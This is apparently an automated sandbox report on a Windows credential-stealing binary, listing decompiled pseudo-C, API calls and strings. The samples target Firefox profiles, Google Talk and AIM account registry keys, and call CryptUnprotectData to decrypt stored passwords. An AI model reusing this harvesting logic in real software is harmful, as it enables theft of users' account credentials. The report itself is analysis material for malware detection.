                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                  • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                  • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                • _mbscat.MSVCRT ref: 0040FCAD
                                  • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                  • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                  • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
                                • _mbscat.MSVCRT ref: 0040FCD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 748118687-1174173950
                                • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                • _mbscat.MSVCRT ref: 00412188
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                Strings
                                • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                • :\Program Files, xrefs: 0041217E
                                • ProgramFilesDir, xrefs: 00412150
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                • API String ID: 3464146404-1099425022
                                • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                  • Part of subcall function 00414E0D: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                  • Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                  • Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E004085B9(void* __ecx, void* __eflags, int _a4) {
                                				char _v8;
                                				long _v4112;
                                				void* __esi;
                                				intOrPtr* _t42;
                                				intOrPtr* _t43;
                                				char* _t46;
                                				int _t52;
                                				void* _t54;
                                				void* _t73;
                                				intOrPtr _t75;
                                				int _t78;
                                				struct HINSTANCE__** _t79;
                                				void* _t81;
                                
                                				0x414060();
                                				_t73 = __ecx;
                                				E0040733E(__ecx + 4);
                                				_t78 = _a4;
                                				if(_t78 == 0) {
                                					L3:
                                					E0040821A(_t85, _t73); // executed
                                					_t79 = _t73 + 0x78;
                                					E00404D18(_t79);
                                					_t42 =  *((intOrPtr*)(_t79 + 4));
                                					if(_t42 == 0) {
                                						_t43 = 0;
                                						__eflags = 0;
                                					} else {
                                						_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
                                					}
                                					if(_t43 == 0) {
                                						L14:
                                						return _t43;
                                					} else {
                                						_a4 = 0;
                                						if( *((intOrPtr*)(_t73 + 0x20)) <= 0) {
                                							L12:
                                							_t75 = _v8;
                                							E00404D18(_t79);
                                							_t43 =  *((intOrPtr*)(_t79 + 8));
                                							if(_t43 != 0) {
                                								_t43 =  *_t43(_t75, 0);
                                							}
                                							goto L14;
                                						} else {
                                							goto L8;
                                						}
                                						do {
                                							L8:
                                							_t46 = E00407455(_a4, _t73 + 4);
                                							_v4112 = 0;
                                							MultiByteToWideChar(0, 0, _t46, 0xffffffff,  &_v4112, 0x800);
                                							0x413df8( &_v4112);
                                							E00408490(_t73, _v8,  &_v4112); // executed
                                							_t52 = wcslen( &_v4112);
                                							if(_t52 > 0) {
                                								_t54 = _t52 + _t52;
                                								if( *((short*)(_t81 + _t54 - 0x100e)) != 0x2f) {
                                									 *((short*)(_t81 + _t54 - 0x100c)) = 0x2f;
                                									 *((short*)(_t81 + _t54 - 0x100a)) = 0;
                                									E00408490(_t73, _v8,  &_v4112);
                                								}
                                							}
                                							_a4 = _a4 + 1;
                                						} while (_a4 <  *((intOrPtr*)(_t73 + 0x20)));
                                						goto L12;
                                					}
                                				}
                                				_a4 = 0;
                                				if( *((intOrPtr*)(_t78 + 0x1c)) <= 0) {
                                					goto L3;
                                				} else {
                                					goto L2;
                                				}
                                				do {
                                					L2:
                                					E00407407(_t73 + 4, E00407455(_a4, _t78));
                                					_a4 = _a4 + 1;
                                					_t85 = _a4 -  *((intOrPtr*)(_t78 + 0x1c));
                                				} while (_a4 <  *((intOrPtr*)(_t78 + 0x1c)));
                                				goto L3;
                                			}

                                APIs
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                • _wcslwr.MSVCRT ref: 0040866E
                                • wcslen.MSVCRT ref: 0040868B
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
                                • String ID: /$/
                                • API String ID: 2365529402-2523464752
                                • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00407F7E(signed int _a4) {
                                				void* _v12;
                                				int _v16;
                                				void* _v20;
                                				void _v279;
                                				char _v280;
                                				void _v4375;
                                				int _v4376;
                                				long _t26;
                                				char* _t29;
                                				int _t31;
                                				void* _t39;
                                				void* _t44;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				void* _t51;
                                
                                				0x414060();
                                				E00407C79(_a4); // executed
                                				_t26 =  &_v12;
                                				0x411d68(0x80000001, "Software\Google\Google Talk\Accounts", _t26, _t44, _t39);
                                				_t49 = _t48 + 0xc;
                                				if(_t26 == 0) {
                                					_v16 = 0;
                                					_v280 = 0;
                                					memset( &_v279, 0, 0xff);
                                					_t50 = _t49 + 0xc;
                                					_t29 =  &_v280;
                                					0x411dee(_v12, 0, _t29);
                                					while(1) {
                                						_t51 = _t50 + 0xc;
                                						if(_t29 != 0) {
                                							break;
                                						}
                                						_t31 =  &_v280;
                                						0x411d68(_v12, _t31,  &_v20);
                                						_t50 = _t51 + 0xc;
                                						if(_t31 == 0) {
                                							_v4376 = _t31;
                                							memset( &_v4375, _t31, 0xfff);
                                							_t50 = _t50 + 0xc;
                                							0x411d82(_v20, 0x418304);
                                							E00407E33(_a4,  &_v280,  &_v4376);
                                							RegCloseKey(_v20);
                                						}
                                						_v16 = _v16 + 1;
                                						_t29 =  &_v280;
                                						0x411dee(_v12, _v16, _t29);
                                					}
                                					_t26 = RegCloseKey(_v12);
                                				}
                                				return _t26;
                                			}

                                APIs
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
                                  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                  • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                  • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                  • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00407FCC
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • memset.MSVCRT ref: 00408019
                                • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 2959138223-1079885057
                                • Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                • Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
                                • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                  • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • memset.MSVCRT ref: 00412297
                                • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                • _mbscpy.MSVCRT ref: 0041230C
                                  • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 3929982141-2036018995
                                • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E0040C427(void* __eax, intOrPtr* __ebx) {
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr* _t19;
                                				void* _t20;
                                				void* _t21;
                                				struct HICON__* _t23;
                                				intOrPtr* _t30;
                                				void* _t32;
                                				intOrPtr* _t35;
                                
                                				_t30 = __ebx;
                                				 *((intOrPtr*)(__ebx + 0x140)) = 0;
                                				 *__ebx = 0x418778;
                                				 *((intOrPtr*)(__ebx + 0x388)) = 0;
                                				 *((intOrPtr*)(__ebx + 0x394)) = 0;
                                				0x413d5c(0x738);
                                				if(__eax == 0) {
                                					_t19 = 0;
                                					__eflags = 0;
                                				} else {
                                					_t19 = E0040D339(__eax);
                                					 *0x41e15c = _t19;
                                				}
                                				 *((intOrPtr*)(_t30 + 0x38c)) = _t19;
                                				0x413d5c(); // executed
                                				_t35 = _t19;
                                				_t40 = _t35;
                                				_t32 = 0x8fc;
                                				if(_t35 == 0) {
                                					_t35 = 0;
                                					__eflags = 0;
                                				} else {
                                					E004092CC(_t35, _t40);
                                					_t5 = _t35 + 0x1cc; // 0x1cc
                                					_t6 = _t5 + 8; // 0x1d4
                                					 *_t35 = 0x417eb8;
                                					E0040D339(_t6);
                                					 *_t5 = 0x417f40;
                                					 *(_t35 + 0x1c8) =  *(_t35 + 0x1c8) | 0xffffffff;
                                				}
                                				 *((intOrPtr*)(_t30 + 0x390)) = _t35;
                                				_t20 =  *(_t30 + 0x388);
                                				if(_t20 != 0) {
                                					DeleteObject(_t20);
                                					 *(_t30 + 0x388) = 0;
                                				}
                                				_t21 = E00406AE0(); // executed
                                				 *(_t30 + 0x388) = _t21;
                                				E00401000(_t32, _t30 + 0x285, 0x418678);
                                				 *((intOrPtr*)(_t30 + 0x174)) = 0;
                                				 *((intOrPtr*)(_t30 + 0x17c)) = 0;
                                				 *((intOrPtr*)(_t30 + 0x178)) = 0;
                                				 *((intOrPtr*)(_t30 + 0x170)) = 0;
                                				_t23 = LoadIconA( *0x41dbd4, 0x65); // executed
                                				E00402C8F(_t30, _t23);
                                				return _t30;
                                			}













                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$DeleteIconLoadObject
                                • String ID: ;@
                                • API String ID: 1986663749-2925476404
                                • Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                • Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
                                • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                  • Part of subcall function 00414DF0: GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
                                  • Part of subcall function 00414DF0: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                  • Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                  • Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                • GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProcProtectVirtual$HandleModule
                                • String ID:
                                • API String ID: 2152742572-0
                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00404C9D(struct HINSTANCE__** __eax, void* __eflags) {
                                				void* __esi;
                                				struct HINSTANCE__* _t7;
                                				_Unknown_base(*)()* _t10;
                                				struct HINSTANCE__** _t11;
                                
                                				_t11 = __eax;
                                				E00404CE0(__eax);
                                				_t7 = LoadLibraryA("crypt32.dll"); // executed
                                				 *_t11 = _t7;
                                				if(_t7 != 0) {
                                					_t10 = GetProcAddress(_t7, "CryptUnprotectData");
                                					_t11[2] = _t10;
                                					if(_t10 != 0) {
                                						_t11[1] = 1;
                                					}
                                				}
                                				if(_t11[1] == 0) {
                                					E00404CE0(_t11);
                                				}
                                				return _t11[1];
                                			}








                                APIs
                                  • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: CryptUnprotectData$crypt32.dll
                                • API String ID: 145871493-1827663648
                                • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004115A1
                                • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
                                  • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                  • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                  • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                  • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                  • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                  • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
                                • _mbscpy.MSVCRT ref: 0041165E
                                • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
                                • String ID:
                                • API String ID: 3551507631-0
                                • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
                                • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00411CB8
                                  • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                  • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                • memset.MSVCRT ref: 00411CF4
                                • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 21%
                                			E00404220(void* __eflags, intOrPtr _a4, void* _a8) {
                                				signed int _v8;
                                				void* __ecx;
                                				void* __esi;
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				signed int _t20;
                                				void* _t24;
                                				void* _t27;
                                				long _t31;
                                				void* _t34;
                                
                                				_v8 = _v8 & 0x00000000;
                                				_t34 = E004067BA(_a8);
                                				_a8 = _t34;
                                				if(_t34 != 0xffffffff) {
                                					_t31 = GetFileSize(_t34, 0);
                                					_t5 = _t31 - 0x11; // -17
                                					if(_t5 <= 0xfffee) {
                                						_t6 = _t31 + 1; // 0x1
                                						_t17 = _t6;
                                						0x413d5c(); // executed
                                						_t27 = _t17;
                                						_t24 = _t17;
                                						_t18 = E00406ED6(_t27, 0, _t34, _t24, _t31); // executed
                                						if(_t18 != 0) {
                                							_t19 = E00406B3B();
                                							_t43 = _t19;
                                							if(_t19 == 0) {
                                								_push(_t31);
                                								_push(_t24);
                                							} else {
                                								_push(_t31 + 0xfffffff4);
                                								_t7 = _t24 + 0xc; // 0xc
                                							}
                                							_push(_a4);
                                							_t20 = E004049E6(_t43); // executed
                                							_v8 = _t20;
                                						}
                                						0x413d56(_t24);
                                					}
                                					CloseHandle(_a8);
                                				}
                                				return _v8;
                                			}















                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
                                • ??2@YAPAXI@Z.MSVCRT ref: 00404257
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • ??3@YAXPAX@Z.MSVCRT ref: 00404291
                                • CloseHandle.KERNEL32(?), ref: 0040429A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 1968906679-0
                                • Opcode ID: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
                                • Opcode Fuzzy Hash: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
                                • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                • LockResource.KERNEL32(00000000), ref: 004120C4
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
                                • String ID:
                                • API String ID: 1149579341-0
